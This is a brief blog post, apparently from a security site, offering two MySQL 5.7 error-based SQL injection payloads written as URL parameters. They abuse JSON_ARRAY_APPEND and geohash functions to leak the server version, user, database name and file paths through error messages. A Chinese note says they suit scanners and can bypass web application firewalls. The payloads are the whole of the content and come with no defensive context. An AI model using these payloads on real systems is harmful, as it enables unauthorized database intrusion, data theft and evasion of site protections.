MENU

MySQL 5.7.X Error based injection

July 21, 2016 • Security

MySQL 5.7.X Error based injection:

?id=JSON_ARRAY_APPEND(concat(0x414b3438,0x09,@@version,0x09,user(),0x09,database()),1,1)

002937hmcclkkrmfenec8o.jpg

?id='%26ST_AsText(ST_LongFromGeoHash(concat(0x414b3438,0x09,@@character_sets_dir,0x09,@@log_bin_index)))%26'

适用于扫描器, 可绕过Waf探测基于显错型注入。

210905xd1rhhbjvbob1vvp.jpg

Archives QR Code
QR Code for this page
Tipping QR Code